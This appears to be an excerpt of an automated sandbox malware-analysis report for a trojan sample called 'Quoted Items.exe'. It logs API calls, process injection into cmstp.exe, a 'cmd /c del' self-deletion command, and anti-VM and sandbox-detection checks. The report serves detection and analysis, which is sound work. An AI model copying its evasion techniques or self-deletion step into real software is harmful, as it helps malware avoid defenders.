          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0511B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0511A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC85D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC8680 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC87B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC8700 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC86FA NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC87AA NtAllocateVirtualMemory,
          Source: Quoted Items.exe, 00000000.00000002.291013641.0000000007840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Quoted Items.exe
          Source: Quoted Items.exe, 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Quoted Items.exe
          Source: Quoted Items.exe, 00000000.00000002.285355220.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAuthorizationRuleCollect.exe6 vs Quoted Items.exe
          Source: Quoted Items.exe, 00000004.00000000.276006405.000000000069C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAuthorizationRuleCollect.exe6 vs Quoted Items.exe
          Source: Quoted Items.exe, 00000004.00000002.352397627.000000000140F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quoted Items.exe
          Source: Quoted Items.exe, 00000004.00000003.281729313.0000000000F3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quoted Items.exe
          Source: Quoted Items.exe, 00000004.00000003.286087431.00000000010EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quoted Items.exe
          Source: Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quoted Items.exe
          Source: Quoted Items.exeBinary or memory string: OriginalFilenameAuthorizationRuleCollect.exe6 vs Quoted Items.exe
          Source: Quoted Items.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Quoted Items.exeVirustotal: Detection: 44%
          Source: Quoted Items.exeReversingLabs: Detection: 48%
          Source: Quoted Items.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Quoted Items.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Quoted Items.exe "C:\Users\user\Desktop\Quoted Items.exe"
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess created: C:\Users\user\Desktop\Quoted Items.exe C:\Users\user\Desktop\Quoted Items.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quoted Items.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess created: C:\Users\user\Desktop\Quoted Items.exe C:\Users\user\Desktop\Quoted Items.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quoted Items.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\Quoted Items.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quoted Items.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
          Source: C:\Users\user\Desktop\Quoted Items.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01
          Source: Quoted Items.exe, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: Quoted Items.exe, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.Quoted Items.exe.bf0000.0.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.Quoted Items.exe.bf0000.0.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.Quoted Items.exe.bf0000.0.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.Quoted Items.exe.bf0000.0.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.Quoted Items.exe.600000.3.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.Quoted Items.exe.600000.3.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.Quoted Items.exe.600000.2.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.Quoted Items.exe.600000.2.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.Quoted Items.exe.600000.1.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.Quoted Items.exe.600000.1.unpack, oK/KZ.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Quoted Items.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Quoted Items.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Quoted Items.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Quoted Items.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: AuthorizationRuleCollect.pdb source: Quoted Items.exe
          Source: Binary string: wntdll.pdbUGP source: Quoted Items.exe, 00000004.00000003.279757387.0000000000E29000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351539993.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000003.285678625.0000000000FCC000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.351171334.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.352532340.0000000004F11000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Quoted Items.exe, 00000004.00000003.279757387.0000000000E29000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351539993.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000003.285678625.0000000000FCC000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000010.00000003.351171334.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.352532340.0000000004F11000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: Quoted Items.exe, oK/KZ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.0.Quoted Items.exe.bf0000.0.unpack, oK/KZ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.2.Quoted Items.exe.bf0000.0.unpack, oK/KZ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 4.0.Quoted Items.exe.600000.3.unpack, oK/KZ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 4.0.Quoted Items.exe.600000.2.unpack, oK/KZ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 4.0.Quoted Items.exe.600000.1.unpack, oK/KZ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 4.0.Quoted Items.exe.600000.5.unpack, oK/KZ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 4.0.Quoted Items.exe.600000.0.unpack, oK/KZ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 4.0.Quoted Items.exe.600000.7.unpack, oK/KZ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_02D693BD pushad ; retf
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_02D690D0 pushad ; retf
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_02D69BED pushad ; retf
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_02D6987F pushad ; retf
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_07837017 pushfd ; retf
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0040C8D2 push esp; iretd
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0041C905 push dword ptr [DE3B1691h]; ret
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0041612A push 78D33A13h; iretd
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_004161B3 push 78D33A13h; iretd
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0040C2F8 push ds; retf
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0040D417 push 00000060h; iretd
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0041CDA5 push 073A5053h; ret
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00414E92 push esp; ret
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00414EA2 push ds; retf
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0041B7C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0512D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DBC8D2 push esp; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DCB87C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DCB81B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DCB812 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC61B3 push 78D33A13h; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DCC905 push dword ptr [DE3B1691h]; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC612A push 78D33A13h; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DBC2F8 push ds; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DBD417 push 00000060h; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DCCDA5 push 073A5053h; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC4E92 push esp; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DC4EA2 push ds; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.72747835774

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\Quoted Items.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del "C:\Users\user\Desktop\Quoted Items.exe"
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 0.2.Quoted Items.exe.2fc435c.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.2fd9a34.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.2fcd7e8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Quoted Items.exe PID: 6360, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Quoted Items.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Quoted Items.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000DB8604 second address: 0000000000DB860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000DB898E second address: 0000000000DB8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Quoted Items.exe TID: 6364Thread sleep time: -45733s >= -30000s
          Source: C:\Users\user\Desktop\Quoted Items.exe TID: 6388Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 1508Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Quoted Items.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\cmstp.exeAPI coverage: 7.1 %
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeThread delayed: delay time: 45733
          Source: C:\Users\user\Desktop\Quoted Items.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.313752460.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.374832571.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000005.00000000.326795493.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: explorer.exe, 00000005.00000000.294924732.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 00000005.00000000.306967139.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: cmstp.exe, 00000010.00000002.515589194.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515741190.0000000003409000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000000.314689990.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.313752460.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0515A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05104D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05104D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05104D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
